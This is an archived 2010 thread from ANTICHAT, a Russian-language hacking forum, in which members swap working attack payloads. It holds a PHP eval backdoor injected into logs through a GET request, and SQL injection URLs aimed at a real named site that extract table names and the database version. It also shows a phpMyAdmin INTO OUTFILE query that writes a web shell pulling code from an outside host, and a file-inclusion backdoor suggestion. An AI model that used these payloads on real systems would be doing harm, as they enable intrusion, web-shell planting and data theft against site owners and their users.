ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.05.2010, 19:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Сообщение от kfor
Подскажите как передать гет запрос с <? system.... ?> , что бы в логах скобочки не заменились на %3c %3e
<?php file_get_contents('http://site.ru/<?php eval(stripslashes($_REQUEST[cmd]));?>');?>
|
|
|
03.05.2010, 21:34
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Всем привет! наткнулся на такую ошибку...
Код:
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 42 in /home/site/public_html/php/config/functions.php on line 931
Урл вида: http://.sita.net/index.php?id=11&new=-6
Можно ли провести инъекцию  |
|
|
|
03.05.2010, 21:34
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
pinch
http://www.retention.se/news.asp?id=1+and+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES)&pg=1
и далее по сценарию
======================
Pashkela
Опять у тебя ненужные навороты. Они запутывают людей
Зачем
http://www.retention.se/news.asp?id=1+or+1=convert(int,@@version)&pg=1
Если
http://www.retention.se/news.asp?id=1+or+1=@@version&pg=1
|
|
|
|
03.05.2010, 22:11
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
спасибо. оказывается фильтры на: select, or, OR, --
а я из мухи слона делаю
|
|
|
|
03.05.2010, 23:39
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
Провел на форуме:
721727
Репутация:
397
|
|
Потому что это тхт файл который не выполняется =/
Надо с раширением php залить.
|
|
|
|
03.05.2010, 23:41
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Может, потому что там file_get_contents, а не инклуд?
|
|
|
|
03.05.2010, 23:49
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
Провел на форуме:
721727
Репутация:
397
|
|
Бгг да точно) но как бы он его как-то залил... логика значит надо залить с другим расширением ато да читалка)
|
|
|
|
03.05.2010, 23:52
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Такая ситуация:
Есть PhpMyAdin права полный Root
Делаю запрос вида
select '<? @include("http://site.ru/files/shell.txt"); ?>' into outfile 'D:/WWW/files/shell.php';
Создаеться файл .php, но когда захожу на него, там пустой белый лист!!!
А когда делаю запрос
select '<? phpinfo(); ?>' into outfile 'D:/WWW/files/info.php';
выводиться полный phpinfo!!
что может быть не так?
|
|
|
|
04.05.2010, 00:01
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
Провел на форуме:
721727
Репутация:
397
|
|
попробуй залить include($_GET[file]) ...
|
|
|
|
04.05.2010, 00:13
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666
Репутация:
439
|
|
я извиняюсь, мой пост затерялся, поетому спрошу ещё раз.
Сообщение от [ DSU ]
Потому что это тхт файл который не выполняется =/
Надо с раширением php залить.
с php вобще ничего не показывает.
Сообщение от wildshaman
Может, потому что там file_get_contents, а не инклуд?
возможно. как в этом случае можно глянуть какая функция используется. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [ DSU ]](/avatars/avatar43637.jpg?2121037){kind=avatar}
![Аватар для [ DSU ]](/avatars/avatar43637.jpg?2121065){kind=avatar}
![Аватар для [ DSU ]](/avatars/avatar43637.jpg?2121094){kind=avatar}
Похожие темы
Линейный вид
